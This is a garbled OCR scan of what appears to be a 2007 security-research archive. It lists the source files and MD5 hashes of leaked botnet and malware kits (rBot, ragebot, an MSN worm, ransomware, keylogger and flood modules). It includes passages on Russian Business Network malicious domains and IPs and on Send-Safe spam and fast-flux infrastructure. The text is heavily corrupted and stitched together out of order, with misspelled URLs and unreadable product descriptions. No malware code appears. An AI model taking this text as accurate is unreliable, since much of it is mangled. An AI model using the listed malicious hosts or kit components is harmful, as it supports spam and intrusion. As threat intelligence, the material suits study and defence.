cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
commands.cpp 


€926a32119172b5c5b3b864c17ce50c9 
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commands.h 
909fd90271f84f32a2055ab9b0d0ab16 
configs.h 
b63341d7f8d0eae732b30dfd8500a8e5 
connect.cpp 
e8aa47461097136302ca933d5850b857 
connect.h 
10946f81be88475e55811a77987eabc6 
crc32.cpp 
2a4377a7dd0cf00d4b8616c71ac214b7 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
80b0417f8ea47793fad63fdf24612612 
crypt.h 
08a97e457623fad4581c54c74683da46 
dcc.cpp 
ae422459eeab449168ec776f1810f602 
dcc.h 
ad4710849d8896ad549ddefcb9155456 
dcom.cpp 4be7116bcd906d944af9e805c9b0abae 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
defines.h 
ec195d90c72378cc70524b7ba821be2d 
download.cpp 
ece02419d71937fd1d28a69fc82a80da 
download.h 
49ab0e8faa2604c1eb30134349a38b75 
driveinfo.cpp 
91624c3b663fc97ddc2be9fb5clbellc 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
d55e4f6675fd42df5640f5e854650a86 
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ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
8af0e0a9d07e9a67661b10a6ac737337 
findfile.cpp 
56248524e6eebd756555bed0c7ba4cf5 
findfile.h 
07893d11ae94aal195864e12daf4ed723 
findpass.cpp 
5c5eed472d3104b7f32e561868fc171f 
findpass.h 
fd81241be159669cbb7bd1ccbd780098 
fphost.cpp 
03c76aa4b6aa032655cece23cf38db31 
fphost.h 58f4f29aebf8d13ac2953074c64f3d6c 
ftptransfer.cpp 
0654fdcdceld7adb5904e91c0c5d1da2 
ftptransfer.h 
a85d530218630b341c9462d724fde0el 
functions.h 
6d7283c4075557a7b312b907165649de 
global.h 3755356ffe76d8e33b47c447c6a18949 
globals.h 
04a192b835c563ca4ca621b756732afe 
httpd.cpp 
1d2f3449769c5bdbad65776b5559f8cc 
httpd.h 
7801a5cac72966f5405f792c30272be5 
icmpflood.cpp 
acda7flc2ddcd97ca4a13e947ea09320 
icmpflood.h 
bc517c0186204377f05420a382a8b246 
ident.cpp 
3087319096f03dff719992c60fb159ac 
ident.h 
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56c539d97aec2572f6fc9349edd7d9c2 
iisSssl.cpp 
e€52f5935b780c28ce3564ffca83816e0 
iis5ssl.h 
c59eb88c83cff84e75a02897215ad2ce 
includes.h 
c59c327e6b3a0cbe5a3661fel16da73e 
irc send.cpp 
e€7952a627c5107afe7a9c429baaal64e 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
€3145961652c9a80ac53cc48fad0db36 
keylogger.h 
a3fa94a8eded832eb86c470cd7c4bf69 
loaddlls.cpp 
3afb340415a885d5fb0483239c964001 
loaddlls.h 
5fla0cd63a96c2a6504ab902ebc44cea 
Isarestrict.cpp 
f34892f55a6be92bf8f98f0598alee7d 
Isarestrict.h 
d144f4791a5432020b0560c4cbca2948 
Isass.cpp 
a9b1c048a214980040f114140618b6b7 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp cfo92641b2b4358dccc641a8f4b5fd10 
misc.h 
d2d8e89037cbe8983b503bb2a64a5c2c 
mssql.cpp 
93cf26ad586dc655731e8bac1360ef34 
mssql.h 
742394ed531laab2ecc958daf5305723e 


net.cpp 
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dceb3d6ba7cc69b46c8ba73bdcc81297 
net.h 
d31221b4e1e02ab884bc86c135a8ala2 
netbios.cpp 
7c3d9ac4f8b73e5bce7b9fec91lbe2c01 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netutils.cpp 
bde701358bef3b1085693f161f07b9eb 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
passwd.h c300d3b2a40113092a84186424b56079 
pingudp.cpp 
4cdf1957f2a2ba19e0a8668bc05be401 
pingudp.h 
86830ef639d1e8bf17a4e591d9c00369 
processes.cpp 
4d2e54c1dc0793da27dbbbfed522ad6b 
processes.h 
b6532beb1cdd78e025d19e9ddf0101d7 
protocol.cpp 
f2f3a4648210c0b522e7ceb10d57260e 
protocol.h 
7623eb76329202ffcc4ea53d595f350e 
psniff.cpp 
1b04516240f9ffc400b26dac8659bf5d 
psniff.h a0d66d37f4304638f48b73a981c55b98 
pwnBol.cpp 
a3c75df7e1083aaa776843e8e19b179d 
pwnBoT.h cb492b7df9b5c170d7c87527940eff3b 
redirect.cpp 
e64df538bd0512443c19940f4ala8feb 
redirect.h 
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dbdea8cc76f18e27c1d0f0611f69cf0a 
remotecmd.cpp 
16b332f2f3a2c2fc795450da6f8dc859 
remotecmd.h 
371fb06d45888807591157d53a7de366 
rlogind.cpp 
977cb502d2212a1507e647986d878873 
rlogind.h 
81d70d74bd5d4fe5laccce52ffade220 
rndnick.cpp 
5f44e3baf10d648348a6cf570860c0a2 
rndnick.h 
6bf753533711a8b345bcd5a529ec67ea 
secure.cpp 
134d9fba6b371c4b56d2c959c2c72e07 
secure.h 0100€8387e559b710e23c9a925853e86 
session.cpp 
744c3dce43d816c42405d153df9dbe47 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
956f76d277159a2ab46da65dbd6066e9 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
0c16730f97a693c0706026c980fefaa4 
socks4.h b98ff274c3b2295f674ef0e2c0a7dfbe 
startup.cpp 
78780ca4b53b7f16436d53278a4d533f 
startup.h 
0113bcd128d74beafa38c65fc044d2al 
synflood.cpp 
e30fcdaef7ee87966b31c9fd1475de5a 
synflood.h 
16520f2d0e397f844b70acbcd89c28a2 
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sysinfo.cpp 
78bb9ea5bd2276a961a0f9709a6fE9b8 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
f62b126a8b98fcdeefd985c7c4e687c6 
tcpflood.h 
93c9fdc13b546554d78489a8a7e18558 
tcpip.h 
73fdcOleeb40f5129ad673b68c2d0575 
tftpd.cpp 
78¢424a26a27b946c95623be51le3ebc5 
tftpd.h 
f68e2d06e68b2ff461d274fbb97adec9 
threads.cpp 
cbh6ee2c1e94328865d952c851a7d7a55 
threads.h 
b2f1929a620a86628e07a4a221ee0530 
visit.cpp 
1b8e612b9ef24063b45c1fc792f614F4 
visit. 
433805bc4a37159242ee8664ac5a6f6b 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
Q8BOT.c 
193dde5d5130456a27d1fef8cf389867 
Q8See.c 
7e8ea32a947baca60712517ae2fafl6f 
advscan.cpp 
52dac98927elad2cclefe67fd71975d1 
advscan.h 
c014244547831602fdc6elf4cbc9e1a8 


aliaslog.cpp 
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826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
5f3dc7cfla875ce8dcf1101ab4195606 
autostart.cpp 
306dd702bbb1613d95c0bb1d8c95ae92 
autostart.h 
0b671f6bf5b870d2504111fbba49a34c 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
27a5909783a2800888fbcdc783654228 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 8d9cb8413030fb67e5fb1a68ca8791ab 
changes.txt 
8f59201293785cfb2181acbd79b65580 
configs.h 
184d29be7636d4752fbc7c44f0ea0816 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
201505baeb1f81010ee422bcfeeed253 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
8c8dada8d04807e5ab1b3b0c3e471762 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
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reported malicious to them, not once but numerous times by different organizations starts 
serving [7]a fake account suspended message like the following [8]malicious domains hosted 
at the RBN do: 


"This Account Has Been Suspended For Violation Of Hosting Terms And Conditions. Please 
contact the billing/support department as soon as possible" 


- superengine.cn (81.95.149.181) - fake account suspended message, no malicious script at 
front page but within the domain 


- eliteproject.cn (81.95.149.124) - fake account suspended message, no malicious script 
at front page but within the domain 


- space-sms.info (200.115.174.248) - fake account suspended, loads the malicious take- 
names.cn 


- lemOn.info - (200.115.174.248) fake account suspended message, obfuscated javascript to 
blOcker.info 


- worldtraff.cn (200.115.174.248) - fake account suspended message, loads blOcker.info 
and takenames.cn 


- takenames.cn (58.65.239.66) - fake of eValid web testing solution, interacting with all 
of these domains 


Dots, dots, dots, 58.65.239.66 or takenames.cn for the time being, used to resolve to 
goodtraff.biz in the past, another RBN operation we know from the [9]Bank of India hack, 
where the second RBN IP was used in the most recent [10]Possibility Media’s Malware Fiasco 
as well. 


. http://doc.bleedingthreats .net/bin/view/Main/RussianBusinessNetwork 
. http://www. bleedingthreats.net/rules/bleeding-rbn.rules 
. http://www. bleedingthreats.net/rules/bleeding-rbn-BLOCK.rules 


http: //ddanchev. blogspot .com/2007/10/rbns-fake-security-software.htm 


| http://adanchev blogspot .con/2007/10/over~100-nalwares-hosted-on-single-rbn. heal 
| http: //olog. wired. com/2Tostroke6/2007/10/controversial-r heal 
_http://adanchev blogspot .con/2007/10/russian-business-network. ht 

_ http: //Adanchev blogspot. con/2007/08/eank- of-india- serving-nalvare_ ital 


1 
2 
3 
4 
5. http: //rbnexploit. blogspot .com/2007/10/rbn-more-of-their-fake-anti-spyware-and.htm 
6 
7 
8 
9 


28c8ecacd500e08a6b542cb0ed116bbf 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
f7b8dc3c7cf2467f4aaf79e02e8d4247 
defines.h 
0bc9e995d615700089d593a31bbc0657 
download.cpp 

664845639 Laff5fob872236bcb0af8b5 
download.h 
68bab8f504f992bfbea99b08c0edb878 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
2cf2a41bf1a58603724e61e0a4592f0b 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
cf99a1389e0754bd22907c231f02a9d0 
externs.h 
d68dbb76b07c989e52fba279b7c5c133 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d98212d0135c7b031122cb0d2eb1e343 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
c6b64dd7a4f2c5ca512dd9908fb364dc 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h f93f7b0655232865950b674526c35869 
ftpd.cpp 2ba50806afbc29a28491c761720f3821 
ftpd.h 
bfd80ee8c8de0505b0d51bd5757a84a0 


functions.h 
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61b1d05eaba67a9a4c6ee5fe4febf3e8 
globals.h 
c876f6b408b5d176ceb69efa4dff3fb00 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
19cdc4e62ff9171f7d8619f0aaa28a97 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
9083bf2ea5cea7cfOclbdf3a3c2a9d1d 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
90bffb4dd3d42c7ba4fd499d5aac1110 
includes.h 
f355b77b83f9a641d6f4b04cc9a520b9 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 
29a02c252b0ea97cc7b3c5d0f7504del 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
3883179a0f48a6372c02c87bb5faf91b 
list.txt 50594305fa90c9596c69be1ad1a454a4 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
99b775881f740c8c8d4f3353e7fa34f3 
Isass.cpp 

355a49b6756a1dc64a97ff7 2f6c39882 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
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misc.h 
fa6f783e912c7ec25fe0ef68465f4F79 
ms04 007 _asnl.cpp 
f4397911d70e98c2857946b407039e4a 
ms04 _007 asnl.h 
f19acdd5ae34ce9b35ffb6c329778cfe 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
7f4988032438d9e99c5d43bf39c0637d 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
9d54b6d9d58fb836bc4b5e2cec75a60e 
nicklist.h 
f3fb78b4cf249db1868fdl1fdfidf55a3 
passwd.h 4df8daf315111b645769ad7a59f6e4f0 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
4d6114b24264aab8bce7353cff8c3800 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
bfd5dcf9e566841c64c8983f0392437c 
psniff.cpp 
c4eb189f05d2a7ff6e52afeOcdab3bd17 
psniff.h e50aa8b1593bd6d7e6bd1a7b3f5aa27c 
rBot.cpp 07d6101123ebb8a5b2a7478a08e21839 
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rBot.dsp 23c850470cb434bd0b3ced2f4fald2e2 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6fae05ed5830ce92183efd708f650834 

rBot.ncb 92a37ec65a026f506a599b502fcfd4e9 
rBot.opt 20da9fcf3384ffbb490498d74117aea9 
rBot.plg 1d441594f5fd94efee629c918dd01bbf 
rBot.sIn 2ef07f76a6d3449313360154553d6d80 
rBot.suo 852ba086a36993f4faef41f3f9044e7f 
rBot.vcproj 
4b227c38e0f217bbe5922e468e0ab6fes 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
b315861d37294556135fb9db11242ef7 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
ad8a2981780c0984f06f822e3be4c02f 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
f511402f57762817f900996080d7a964 
rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
75d2df7a05a3c4898c28d832af24fc36 
scan.cpp 66cOcfe5563eb8191fda0d9a6781acOf 
scan.h 

bac20f64467dad135d6758d2e053e574 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 0a797cb5f8ef9c6284bade0c3ca0b823 
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session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
b0aad449e1f27b1d217c408106b99080 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
04c1e78799211e7e9e8b480d87ef1f30 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h a7245d75d0a69f34d35af4a89d5a2cbc 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
950edbba7ef35c9b96a5c9d3a5fcbd9b 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
62bbc6d3fde35499f8014708cf3ceed9 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
8457a4ed9d0341081b20c89893237795 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
bOce8f8d7f866b625414eefbc4669c98 
tftpd.cpp 
e11ccc19202c00c861e229c83b1907a2 
tftpd.h 
6611e1292528dd97d2c96e7516e42f8e 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
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threads.h 
8f2204c2552c24b3687cal39fdb30671 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit.h 
432e4b8872844e7cee36fe7eebc10eae 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
b530dc0745bddadbf68652f4bfbebcle 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
config.h eef7522a17b08b4a24371875f5fe3361 
d3des.c 
56cfaa34c608a22f989d6f5ff707001le 
d3des.h 
df98a52277db93658e7384fa84740f24 
downloader.cpp 
c95926aede8535e90be48675d23d84f6 
downloader.h 
4609446912718ffa6ac797869adfe8a2 
DropFile.cpp 
a3caad62bf6c715469cafb3351d96bb7 
dropfile.h 
62f99d6b0a5eb0cd1406cdf598cb6ed4f 
externs.h 
a7ecleaf83998ddff457070c2b9aa29a 
ftpd.cpp 7ac45f048bd14f059ab2beb183875602 
ftpd.h 
96f2143059a249f4607d1878c7b69b7c 
functions.h 
f0c799dc8a453ab52a3ecccbd5aeadc8 
how-to.txt 
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63a58434ff65422f78c7250561a2c03f 
include.h 
45c6820e8372ffacc8d7cO00cf7e6751 
main.cpp 4a68e25575adca89afef3f608de09f2d 
main.h 
594d1bfa45674a39043c87b80b009f4b 
md5.cpp 
f97b432afbc4ecOeb9e0al41e70988F4 
md5.h 
6960e98abd60b3ec4381b6f6a207e60b 
misc.cpp c71a242f90f861875fa74755c3874cfa 
misc.h 
Oelffc66441e6b3bd069ddlebea34ble 
msn.h 
d5178a7446f237b10631d291b89f956a 
MSNMessengerAPI.tlh 
5473fcc9a2d078a85cb95ad7e7d83637 
MSNMessengerAPI.tli 
331541labee23e5d3380b77e050703f3e 
MSNWorm.cpp 
79095a5bd5fbc0795dd46d6d3fe3c7bd 
patcher.cpp 
0928c1e2049cadab7b50fdf8clee618f 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
peer2peer.cpp 
c33deac02727fd9d4184e6dbc7f224da 
peer2peer.h 
18183485966c92b4d34fad7491fcc3ad 
Persist.cpp 
a8a774cb1293f13b4dcad0c2e9fab8c2 
ragebot.dsp 
aeOef3f4f2343cdf75f91e047794b947 
ragebot.dsw 
1090492e85469a355dd966f8d7fe99al 
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ragebot.ncb 
a608e1d898085c961e3a91d438517ae0 
ragebot.opt 
98eba9bd35de98f426851e1013a754 ff 
ragebot.plg 
90e53ddea7f0b38a5949048945813ce3 
rar-inject-add.cpp 
a696e0df7e38d57e7933fa36c1102719 
rar-inject.cpp 
9d59c87df7e2045a0494b83da90dde0a 
rfb.h 
5c1cd97249aa34dee3c7909451c1c8d8 
scanner.cpp 
46016f233f5ff3c26a30276639b7cdb4 
scanner.h 
Oaf1l8bfa1l27bdd849138f5c274ae1844 
string-gen.cpp 
b177ce3c169c133adf054253d30f2fe3 
strings.cfg 
b528612236a9c228cd6161956f43e5al 
strings.h 
ba87551e765407e1be59f5546ec6005a 
tcpip.h 
3464effd01374f2732b9c95252af9740 
version.c 
df0c328df6é4fef519364908bb11890b8 
version.h 
b0Ofe7fb5cfbe5b92fad9716a94091fe 
vnc-rage.cpp 
caecccd956ff660867315a281d13eb64 
vnc-rage.h 
99bec3c207a21162b93169b0670f7d85 
vncabp.cpp 

7110a66f1d4f7 8fc78d67646d16657cb 
vncabp.h 99c77c9c8ac1c92eb502161ad92cde91 
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xor.exe 
dfa50a93b616ele3ald2aac093ea853c 
MSNMessengerAPI.tlb 
e7802e3e938bff54cb2731cd3dc5a69c 
MSNMessengerAPI.tlh 
a3c8b6e0ac161d6f49b527e48250745a 
MSNMessengerAPI.tli 
3213d4abe6a611b9350940fddf4327ad 
MD5ChecksumtTest.exe 
3a83507faf3e5503ce01c6ba85eeal2a 
config.h eef7522a17b08b4a24371875f5fe3361 
d3des.c 
56cfaa34c608a22f989d6f5ffF707001le 
d3des.h 
df98a52277db93658e7384fa84740f24 
downloader.cpp 
c95926aede8535e90be48675d23d84f6 
downloader.h 
4609446912718ffa6ac797869adfe8a2 
DropFile.cpp 
a3caad62bf6c715469cafb3351d96bb7 
dropfile.h 
62f99d6b0a5eb0cd1406cdf598cbed4f 
externs.h 
a7ecleaf83998ddff457070c2b9aa29a 
ftpd.cpp 7ac45f048bd14f059ab2beb183875602 
ftpd.h 
96f2143059a249f4607d1878c7b69b7c 
functions.h 
f0c799dc8a453ab52a3ecccbd5aeadc8 
how-to.txt 
63a58434ff65422f78c7250561a2c03f 
include.h 
460931a3c96523927d48840b89d6b783 


main.cpp 4a68e25575adca89afef3f608de09f2d 
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main.h 
594d1bfa45674a39043c87b80b009f4b 
md5.cpp 
f97b432afbc4ecOeb9e0al141e70988f4 
md5.h 
6960e98abd60b3ec4381b6f6a207e60b 
misc.cpp c71a242f90f861875fa74755c3874cfa 
misc.h 
Oelffc66441e6b3bd069ddlebea34ble 
msn.h 
d5178a7446f237b10631d291b89f956a 
MSNMessengerAPI.tih 
3a961731cla2ebb2dcf35ef2c35f4faf 
MSNMessengerAPI.tli 
b4be07668d63f831cdf907ble3d4d8cd 
MSNWorm.cpp 
79095a5bd5fbc0795dd46d6d3fe3c7bd 
patcher.cpp 
0928c1e2049cadab7b50fdf8clee618f 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
peer2peer.cpp 
c33deac02727fd9d4184e6dbc7f224da 
peer2peer.h 
18183485966c92b4d34fad7491fcc3ad 
Persist.cpp 
a8a774cb1293f13b4dcad0c2e9fab8c2 
ragebot.dsp 
aeQef3f4f2343cdf75f91e047794b947 
ragebot.dsw 
1090492e85469a355dd966f8d7fe99al 
ragebot.opt 
9663af96d07821388c050fal43fc753e 
ragebot.plg 
90e53ddea7f0b38a5949048945813ce3 
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3.11.4 Managed Fast-Flux Provider (2007-11-03 20:59) 
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o Send-Safe Mailer 
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\ 
o Send-Safe Standalone 


Send-Sode Smadaloar iss musdaleee verwon of one of the mow succes nad efficient bulk emnil wereare i the axdowry Ws designed qwecinlly for tose top muilers who prefer w poy oace for the software cece nad thea dost spend 
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‘ 
© Send-Safe Enterprise 


Sead Sede Faverprise iso “clomen” miler, which com be o reed salmon for big emilers who use 2 oF mace servers is their Cammigas Wiiekows Linen & FreektSD veruboan wie wv ailietibe 


Thee alee deme | Parchew fer Kure 94 


ey) Send-Safe Honeypot Hunter 
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c 
c) Send-Safe List Manager 
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4 Send-Safe Proxy Central 
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Vertical integration in the spamming market means you don’t just provide potential customers 
lists in the form of harvested emails, the [l]infrastructure for the mass mailing consisting 
of hundreds of infected PCs, but also, occupying emerging market segments such as the 
need for increasing the [2]overal time a spam/phishing campaign remains online, as well as 
make it hard to traceback courtesy of [3]fast-flux networks. And so, the IP that was host- 
ing the spam/phishing campaign in the last 5 minutes is now clean and has nothing to do with it. 


There’s an interesting tactic [4]phishers and spammers are starting to use, next to the 
pure [5]fast-flux at the DNS level | covered in a previous post, and that is a dynamically 
serving the data from multiple locations per web session. Take [6]meds247.org for instance. 
Who's providing meds247.org’s fast-flux infrastructure? In the first example we had "a 
dynamic subdomain generating spamming host running a proxy server every time the central 
campaign URL gets refreshed via an obfuscated javascript". The javascript is now gone, but 
the content (dynamic per page view) is obtained from dynamic locations behind a proxy. For 
instance, while the domain responds to 78.94.45.76, the content in the session is obtained 
from 72.2.16.236:8088/vti sys. And despite that the DNS records and the content IPs change 
the vti_sys directory structure doesn’t, a fax fluxing service that | feel Send-Safe.com branded 
as "Your Own Proxies" and as it looks like, use on for their own order processing next to 
maintaining a rogue certificate authority for anyone who dares to shop there : 


216.153.170.110:8088/vti _sys/order.php?product=ssnp 
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rar-inject-add.cpp 
a696e0df7e38d57e7933fa36c1102719 
rar-inject.cpp 
9d59c87df7e2045a0494b83da90dde0a 
rfb.h 
5c1cd97249aa34dee3c7909451c1c8d8 
scanner.cpp 
46016f233f5ff3c26a30276639b7cdb4 
scanner.h 
Oafl8bfal27bdd849138f5c274ae1844 
string-gen.cpp 
b177ce3c169c133adf054253d30f2fe3 
strings.cfg 
b528612236a9c228cd6161956f43e5al 
strings.h 
ba87551e765407e1be59f5546ec6005a 
tcpip.h 
3464effd01374f2732b9c95252af9740 
version.c 
df0c328df64fef519364908bb11890b8 
version.h 
b0Ofe7fb5cfbe5b92fad9716a94091fe 
vnc-rage.cpp 
caecccd956ff660867315a281d13eb64 
vnc-rage.h 
99bec3c207a21162b93169b0670f7d85 
vncabp.cpp 
7110a66f1d4f78fc78d67646d16657cb 
vncabp.h 99c77c9c8ac1c92eb502161ad92cde91 
xor.exe 
dfa50a93b616ele3ald2aac093ea853c 
MSNMessengerAPI.tlb 
e7802e3e938bff54cb2731cd3dc5a69c 
MSNMessengerAPI.tlh 
063772bff2348f45474a2f02eb0d7e4a 
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MSNMessengerAPI.tli 
e€3f345a230c9f8536c5f17f36d45ee56 
MD5Checksumtest.exe 
3a83507faf3e5503ce01c6ba85eeal2a 
blowfish.c 
62c4d681e018bf1ldb161b711d854a692 
crypt.h 
87ac1bcb98d34905ec431f9f862f2bf2 
mpi-config.h 
901212eb9607ff49d67dc4285a8437d8 
mpi.h 
555c25c428ee6b05903d46273b04a9f2 
RansomWar.c 
3c9eff203853055a5446386159bbf38f 
README.txt 
3b98d36208985eca25cef98acfaf2d09 
ircbot.c d8159f45f3104d810bc66749b9406805 
rBot032.cpp 
af9dcb6ae8f8a2ed2aefc4e52711a707 
rBot032.dsp 
66fd80cc0c04308707ad90ed27eb51d3 
rBot032.dsw 
8c589477e840a49afc4b633523970153 
advscan.cpp 
da56aefbc55e38e661850597019494de 
advscan.h 
5ed5cdbfe64622133e275437db155090 
aliaslog.cpp 
8b113baeddeeab4c593e5e9e8al30c5c 
aliaslog.h 
5b5d906f5f0019fe4d7ce493c28b3802 
autostart.cpp 
306dd702bbb1613d95c0bb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
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beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
cc02f54ee6f64796c472347d235dc8f1 
capture.h 
e0df649d44906ef5e460ac9d3afe9039 
cdkeys.cpp 
0362f8d1ccb9b0df9476e4b48704b226 
cdkeys.h c516c3168da496b203a4e71a7d72656e 
changes.txt 
2¢€173c98ef2c11e8b1e969b538b20ac3 
configs.h 
d99ddce2a13e427664d36993f2af6931 
crc32.cpp 
4fa7e51e08884c68713a7a844128df82 
crc32.h 
lcdO0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
d1b2009632326a355949332e77541fd5 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
€14583f23776c7fd1383bfe934c4d6b2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
51dba8236828b379b65bd3bedde830ad 
dcc.h 
85292f79b21e5f5a9aed9770804b0e19 
dcom.cpp c9e94f91512de5e60d5135dlacca856b 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
7c1fa9e124ca0629795c13b68c82Ff25b 
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dcom2.h 
baf9d3b315b1d84ad96ea9d89999753e 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
€48a61024b2a3c991f7a4faela0a2d38 
download.cpp 
7a616d2936cd85c1c719014a3eld9dff 
download.h 
6dd6bd9b4f982ee5443772ca775alb9F 
driveinfo.cpp 
Oe3b5f5ec21ba5a03e0dde9f2523881b 
driveinfo.h 
d139b6d77a4a3b3d41928cfa90613d01 
externs.h 
3321901281d509ad6944dd447da8c279 
findfile.cpp 
8cd91e7db6bedb502705726f2bb277da 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
flood.cpp 
8ebc641037c3087339faa4fe429b424f 
flood.h 

4607d7eff8b5f60d4eeb6af3 9f8cfce04 
fphost.cpp 
48c440982ab6b320da0181cbf94a6671 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
functions.h 
7ac3cf2df935e44ea60e3d7845e234a4 
globals.h 
15370dbb17c160b8cbddbf0d85a0f8d5 
httpd.cpp 
7e7a8677cf8298d1597cf8397f51773¢c 
httpd.h 
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9aalbc9e308406bf716814edcd68b509 
ident.cpp 
07ef48d935ec546da68d6c2d43d4e6fO 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
e8aafc607241eeca0bc984c7db98a56c 
irc send.cpp 
4d1dc011e75008e0686adfef2b4ce60a 
irc send.h 
deb80fe9faf3ad07e4abfla6df76102c 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt a6875f7883fd3248ca96e89e0350c3ec 
loaddlls.cpp 
eecObfbf5b8c264600b58011645cacd8 
loaddlls.h 
10912fb54b7c7903f3a908a64b1ac37a 
Isass without batfile.cpp 
23504492eee0cbd9d6c8e5a30609b7a2 
Isass.cpp 
2b6256036842827b53d931b3c7edc5b52 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp £725317a7c909bdf939e42c47e55af67 
misc.h 
2c8041be9a426b1478882a3958a7f78a 
mssql.cpp 
7943d2d1e76ed8c6769cc0ec14c3fa6c 


mssql.h 


11527 


742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
a0c5e7d062ebbf611c5818ea8c176f50 
mydoom.h 1e0f4d2715a8bdd200e5c56d5c625fb1 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
dcbc001a93acb4albbdb293f2ff68575 
net.h 
d31221b4e1e02ab884bc86c135a8ala2 
netbios.cpp 
242f5b10f3baf2fef745e53d38022e05 
netbios.h 
a239bd672842a4b3baal66de90ec53e0 
netdevil.cpp 
2d66e0df67f4388e3764ef4698c00Ff17 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
